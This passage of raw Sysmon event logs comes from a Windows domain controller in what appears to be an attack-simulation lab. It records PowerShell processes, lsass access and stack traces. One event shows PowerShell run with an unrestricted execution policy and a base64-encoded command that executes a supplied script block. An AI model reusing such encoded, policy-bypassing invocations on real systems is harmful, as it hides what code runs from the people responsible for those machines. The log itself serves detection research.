wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31605469(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b1499a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b72e69(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b564ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b564ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b5635f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b482e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b54817(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b5440a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b54133(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b53e04(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31605469(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b3ac65(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b3a235(wow64) 154100x80000000000000004128Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.528{D28789B6-7CCC-5FA1-CC00-000000008801}3576C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CCC-5FA1-4F36-080000000000}0x8364f0HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{D28789B6-7CCC-5FA1-CB00-000000008801}3508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x80000000000000004127Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.505{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004126Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.505{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004125Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.505{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004124Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.458{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7CCC-5FA1-CB00-000000008801}3508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004123Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.458{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7CCC-5FA1-CB00-000000008801}3508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000004122Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.411{D28789B6-7CCC-5FA1-CB00-000000008801}3508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_5thkplcv.fhh.ps12020-11-03 15:52:44.411 10341000x80000000000000004121Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.396{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7CCC-5FA1-CB00-000000008801}3508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004120Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.380{D28789B6-7CCC-5FA1-C800-000000008801}31001104C:\Windows\system32\conhost.exe{D28789B6-7CCC-5FA1-CB00-000000008801}3508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004119Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.380{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004118Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.380{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004117Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.380{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004116Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.380{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004115Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.380{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004114Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.380{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004113Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.380{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004112Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.380{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004111Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.380{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004110Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.380{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7CCC-5FA1-CB00-000000008801}3508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004109Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.380{D28789B6-7CCC-5FA1-CA00-000000008801}2816612C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CCC-5FA1-CB00-000000008801}3508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+316032a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30aa4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30aa3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31555466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30a64997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30ac2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30aa64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30aa64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30aa635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30a982e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30aa4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30aa4407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30aa4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30aa3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31555466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30a8ac62(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30a8a232(wow64) 154100x80000000000000004108Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.380{D28789B6-7CCC-5FA1-CB00-000000008801}3508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft 